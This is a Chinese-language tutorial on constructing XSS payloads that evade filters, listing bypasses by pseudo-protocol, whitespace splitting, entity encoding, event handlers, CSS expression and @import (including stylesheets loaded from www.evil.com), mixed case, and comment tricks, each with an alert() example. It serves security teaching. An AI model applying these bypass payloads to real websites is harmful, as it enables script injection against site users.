XSS 跨站脚本攻击之构造剖析(一)

1.XSS-Filter：跨站脚本过滤器，用于分析用户提交的输入，并消除潜在的跨站脚本攻击

（1）XSS Filter实际上是一段精心编写的过滤函数作用是过滤XSS跨站脚本代码；

（2）绕过XSS Filter的测试：

**利用<>标记注射Html/javaScript ，因此XSS Filter首先要过滤和转义的就是“<>”或“<script>”等字符

**利用标签属性值来执行XSS，很多HTML标签都支持JavaScript：[code]伪协议的形式，这个特殊的协议类型声明了URL的主体是任意的javascript代码

例如：<img src="javascript:alert('XSS');">

不是所有的浏览器都支持伪协议的

并不是所有标记的属性值都能产生XSS，通常只有引用文件的属性才能触发跨站脚本：

href=     ;lowsrc=    ;bgsound=   ;backgroud=   ;value=   ;action=     ;dynsrc=   ;

**空格回车Tab，如果XSS Filter仅仅把敏感的输入字符列入黑名单，用户可以利用空格，回车和Tab键绕过限制

例如：<img src="javas   cript:alert('/XSS/')" width=100> 注意：Javas和cript之间的间隔不是由空格键添加的，而是由Tab键添加的

使用关键字拆分的技巧，用户可以突破过滤器的限制，不局限在【Tab】键，还可以使用【回车】和【空格】之类的其他键位符

原因在于：在javascript引擎中，空格除了在引号中分隔单词和强制结束语句之外，额外的空白无论以何种方式添加都无所谓

例如：<img src="

cript:

alert(/XSS/)" width=100>

**对标签属性值转码：用户可以通过编码处理来绕过对普通HTML标记的属性值的进行的过滤，因为HTML中属性值本身支持ASCII码的形式

根据HTML的属性值支持ASCII码的特性，把XSS代码：<img src="javascript:alert('XSS');">  替换为  <img src="javascrip&#116&#58alert(/XSS/);">

t的ASSCII码值为116，用“&#116”表示；  ：则表示为&#58

还可以把&#01，&#02等字符插入到javascript或Vbscript的头部，另外Tab键的ASCII码值是：&#9，换行符的码值是：&#10，回车符的码值是：&#13

**产生自己的事件：javascript和HTML之间的交互是通过事件实现的，事件就是用户或浏览器自身执行的某个动作，比如click，mouseover，load等。响应事件的函数就叫做事                             件处理函数（事件监听器）

事件被划分为3种不同的类型：

①用户接口(鼠标，键盘)

　　　　　　　　　 ②逻辑（处理的结果）

　　　　　　　　　  ③ 变化（对文档进行修改）

例如：<img src="#" onerror=alert(/XSS/)>  onerror是IMG标记的一个事件，只要页面发生错误，该事件立即被激活

**可以用来测试事件型的跨站脚本，有大量的事件可以运用：

onResume,onReverse,onRowDelete,onRowInserted,onSeek,onSynchRestored,onTimeError ,onTrackChange,onURLFlip ,onRepeat,

onMediaError,  onPause ,onProgress ,oncontrolselect ,onOutOfSync  , onafterprint  ,onbeforeprint  ,ondataavailable  ,ondatasetchanged

ondatasetcomplete  , onerrorupdate  ,onrowenter  ,onrowexit  ,onrowsdelete  ,onrowsinserted ,onselectionchange  ,onbounce  ,onfinish

onstop ,onresizeend

**利用CSS跨站剖析：

①例如：<div style="backgroud-image:url(javascript:alert('XSS'))">

②IE5及其之后的版本都支持在CSS中使用expression，使用expression同样可以触发XSS漏洞

例如：<div style="width: expression (alert('XSS'));">

或<style>body{background-image:expression(alert("XSS"));}</style>

③此外，CSS样式表不需要嵌入到HTML代码中，它能从其他文件中甚至从不同的目标机器上进行引用

例如：<link rel="stylesheet" href="http://www.evil.com/attack.css">

④在网页中引用外部CSS还可以利用@import将其导入

例如：<style type='text/css'>@import url(http://www.evil.com/xss.css);</style>

xss.css的内容是：

.showCSS{

event:expression(

onload = function(){

alert('XSS');})

}

⑤此外，@import还有一个特性，就是能直接执行javaScript代码，

例如：<style> @import 'javascript :alert("XSS")';  </style>

**扰乱过滤规则：

①转换大小写之后的XSS：<IMG SRC="javascript:alert(0);">

②大小写混淆的XSS：<iMg sRC="jaVasCript:alert(0);">

③不用双引号，而是使用单引号的XSS：<img src='javascript:alert(0);'>

④不使用引号的XSS：<img src=javascript:alert(0);>

⑤不使用空格，而用/代替：<img/src="javascript:alert('XSS');">

⑥当利用expression执行跨站代码时，可以构造不同的全角字符来扰乱过滤规则：

<xss STYLE="xss: exprEssion(alert('XSS'))">

<div style="{left : e  x  p  r  e   s  s  i   o   n  (alert('XSS')  )  }">

**样式表中的/**/会被浏览器忽略，因此可以结合使用注释字符干扰和欺骗过滤器：

<XSS  STYLE="xss: expr/*XSS*/ession(alert('XSS') ) ">

<div style="wid/**/th:expre/*XSS*/ssion(alert('XSS') );">

**除了/**/之外，样式表中的\和结束符\0也是被浏览器忽略的：

@\0im\port' \0ja\vasc\ript:alert("XSS")';

@\i\0m\00p\000o\0000\00000r\000000t"url";

**还可以将CSS中的关键字进行转码处理，如将e转换为\65，包括改变编码中的0的数量：

<p  style="xss: \65xpression(alert(/XSS/))">

**利用浏览器解析HTML注释存在的问题来执行JavaScript：

例如：

①<!--<img src="--><img  src=x  onerror=alert(1)//>">

②<comment><img src="</comment><img  src=x  onerror=alter(1) //">

③<style><img  src="</style><img src=x  onerror=alert(1)//">